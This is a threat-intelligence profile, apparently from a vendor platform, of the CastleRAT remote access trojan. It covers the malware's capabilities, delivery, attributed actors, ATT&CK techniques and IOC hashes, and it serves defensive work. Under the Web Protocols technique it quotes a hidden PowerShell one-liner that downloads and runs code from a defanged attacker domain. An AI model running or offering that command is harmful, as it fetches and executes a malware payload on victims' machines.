
CastleRAT

CastleRAT is a remote access trojan/backdoor first observed in early 2025 and associated primarily with TAG-150, later named GrayBravo. It has been documented in both Python and compiled C variants. High-confidence capabilities described across the source material include system reconnaissance and collection of host information, querying ip-api[.]com for public IP and geolocation data, downloading and executing additional EXE/DLL payloads, executing commands via CMD and PowerShell, and remote shell access. The Python variant was observed as a CastleLoader payload, sends keep-alive messages every three seconds, and can self-delete. The C variant is described as more capable and includes keylogging, screen capture, and theft of browser credentials; other reporting also states CastleRAT can monitor clipboard contents and capture typed input. CastleRAT uses a custom binary protocol with RC4 encryption and hard-coded 16-byte keys for C2 communications. Persistence reported in the content includes registration of a scheduled task to run at startup. Infrastructure tradecraft includes use of Steam Community pages as dead-drop resolvers for covert C2 resolution beginning in late August 2025, and CastleRAT C2 servers have been observed on ports 80, 443, and 7777. Infection and delivery commonly occur through CastleLoader/CastleBot ecosystems and ClickFix-style social engineering, including fake Cloudflare verification/CAPTCHA pages, fraudulent GitHub repositories, and MSI-based chains that trick victims into copying and executing malicious PowerShell commands. CastleRAT has also been observed in campaigns where Shanya-packed loaders or side-loaded DLL chains ultimately deployed it. Reported secondary payload ecosystems around the associated GrayBravo/TAG-150 operations include SectopRAT, WarmCookie, NetSupport RAT, Stealc, RedLine Stealer, Rhadamanthys Stealer, DeerStealer, MonsterV2, and HijackLoader. 
The malware is linked in the content to financially motivated GrayBravo/TAG-150 activity and, separately, to Iranian state-sponsored MuddyWater operations, with JUMPSEC reporting at least two CastleRAT builds deployed against Israeli targets and warning that detections may overlap with espionage activity. Targeting mentioned in the content includes Israeli targets, logistics-sector victims, hotels in a Booking.com-themed campaign, and broader campaigns affecting government, defense, and other organizations. Reported IOCs directly tied to CastleRAT include SHA-256 hashes 963c012d56c62093d105ab5044517fdcce4ab826f7782b3e377932da1df6896d, f2ff4cbcd6d015af20e4e858b0f216c077ec6d146d3b2e0cbe68b56b3db7a0be, 4ef63fa536134ad296e83e37f9d323beb45087f7d306debdc3e096fed8357395, and 282fa3476294e2b57aa9a8ab4bc1cc00f334197298e4afb2aae812b77e755207.


THREAT ACTORS

Groups observed using it

3 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.

GrayBravo

Additionally, Insikt Group has identified a new remote access trojan linked to TAG-150, dubbed CastleRAT. Available in both Python and C variants, CastleRAT's core functionality consists of collecting system information, downloading and executing additional payloads, and executing commands via CMD and PowerShell.

Source: Recorded Future blog (recordedfuture.com)
MuddyWater

Installer_v1.21.66.msi was built on February 13, 2026, and contains the 'Amy Cherne' code-signing certificate referenced in research tied to MuddyWater, and Russian cybercrime actors using CastleRAT.

Source: Hunt.io blog (hunt.io)
Velvet Tempest

...Velvet Tempest ... used a ClickFix lure ... to drop payloads like DonutLoader and CastleRAT.

Source: The Hacker News (thehackernews.com)
MITRE ATT&CK

Techniques & procedures

26 distinct techniques documented for this family, organized by ATT&CK tactic.

Initial Access

1 technique
T1566 Phishing (2 evidence items)

Infections are most commonly initiated through Cloudflare-themed “ClickFix” phishing attacks or fraudulent GitHub repositories masquerading as legitimate applications.

Execution

5 techniques
T1059 Command and Scripting Interpreter (2 evidence items)

Available in both Python and C variants, CastleRAT's core functionality consists of collecting system information, downloading and executing additional payloads, and executing commands via CMD and PowerShell.

T1059.001 PowerShell (4 evidence items)

Victims are tricked into copying and executing malicious PowerShell commands on their own devices, thereby enabling the compromise.

T1059.003 Windows Command Shell (1 evidence item)

Available in both Python and C variants, CastleRAT's core functionality consists of collecting system information, downloading and executing additional payloads, and executing commands via CMD and PowerShell.

T1204 User Execution (1 evidence item)

Both versions spread by tricking users into pasting malicious commands through a technique called ClickFix, which uses fake fixes and login prompts.

T1559 Inter-Process Communication (1 evidence item)

CastleRAT TTPs list includes “Execution T1559 Inter-Process Communication,” and describes a “hidden command interface… through redirected inter-process communication pipes.”

Persistence

1 technique
T1547 Boot or Logon Autostart Execution (1 evidence item)

It registered for autostart and then executed the clean loader (consent.exe).

Privilege Escalation

2 techniques
T1547 Boot or Logon Autostart Execution (1 evidence item)

It registered for autostart and then executed the clean loader (consent.exe).

T1548.002 Bypass User Account Control (1 evidence item)

CastleRAT TTPs list includes “Privilege Escalation T1548.002… Bypass User Account Control.” MuddyWater also lists T1548.002.

Stealth

2 techniques
T1070.004 File Deletion (2 evidence items)

The following features have been implemented and unchanged since the CastleRAT Python variant was first observed in late July 2025: ... Self-delete

T1218.011 Rundll32 (1 evidence item)

CastleRAT TTPs list includes “Defense Evasion T1218.011… Rundll32.” MuddyWater also lists “T1218.011… Rundll32.”

Credential Access

1 technique
T1056.001 Keylogging (4 evidence items)

The C variant of CastleRAT also includes more advanced stealing capabilities, such as keylogging and screen capturing.

Discovery

3 techniques
T1082 System Information Discovery (2 evidence items)

CastleRAT's core functionality consists of collecting system information... The following features have been implemented... Obtain and report country info of the public IP and system information

T1083 File and Directory Discovery (1 evidence item)

...the C-based iteration, which could facilitate ... file uploads and downloads...

T1614 System Location Discovery (1 evidence item)

Queries the geolocation API ip-api[.]com to obtain location and other information through the infected host’s public IP address

Collection

5 techniques
T1056.001 Keylogging (4 evidence items)

The C variant of CastleRAT also includes more advanced stealing capabilities, such as keylogging and screen capturing.

T1113 Screen Capture (4 evidence items)

The C variant of CastleRAT also includes more advanced stealing capabilities, such as keylogging and screen capturing.

T1115 Clipboard Data (2 evidence items)

...the C-based iteration, which could facilitate ... cryptocurrency clipping...

T1125 Video Capture (1 evidence item)

CastleRAT TTPs list includes “Collection T1125 Video Capture.”

T1185 Browser Session Hijacking (1 evidence item)

CastleRAT TTPs list includes “Collection T1185 Browser Session Hijacking,” and describes manipulating browser behavior by terminating sessions and silently spawning Chromium instances.

Command and Control

7 techniques
T1071 Application Layer Protocol (4 evidence items)

The infrastructure linked to TAG-150 includes both victim-facing Tier 1 components, such as IP addresses and domains used as command-and-control (C2) servers for multiple malware families...

T1071.001 Web Protocols (1 evidence item)

Malware name: C2_10a (T1071.001) ... powershell -w h -ep b -c "iex (iwr 'biokdsl[.]com/upd' -useb).Content"

T1095 Non-Application Layer Protocol (1 evidence item)

CastleRAT is a RAT that includes C and Python variants sharing the following commonalities: Custom binary protocol using RC4 encryption with hard-coded 16-byte keys

T1102.001 Dead Drop Resolver (2 evidence items)

For example, C2 deaddrops hosted on Steam Community pages is a new development, first observed in late August 2025.

T1105 Ingress Tool Transfer (6 evidence items)

The upd script downloaded and unpacked the consent.zip archive, which contained the DLL side-loading components.

T1219 Remote Access Tools (2 evidence items)

Insikt Group has identified a new remote access trojan linked to TAG-150, dubbed CastleRAT.

T1568 Dynamic Resolution (1 evidence item)

For example, C2 deaddrops hosted on Steam Community pages is a new development, first observed in late August 2025.

Exfiltration

1 technique
T1041 Exfiltration Over C2 Channel (1 evidence item)

...a pair of CastleRAT trojan variants enabling system data exfiltration, command execution, and further payload deployment...

INDICATORS OF COMPROMISE

IOCs tracked for this family

11 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.

Network
6 tracked

IPs, domains, and DNS infrastructure linked to this family.

Hashes
5 tracked

File hashes (MD5, SHA-1, SHA-256) from samples and reports.

Type          Value                        Latest sighting
ip.v4         (value withheld on page)     4 months ago
hash.sha256   (value withheld on page)     7 months ago
hash.sha256   (value withheld on page)     7 months ago
hash.sha256   (value withheld on page)     7 months ago
hash.sha256   (value withheld on page)     7 months ago
domain        (value withheld on page)     10 months ago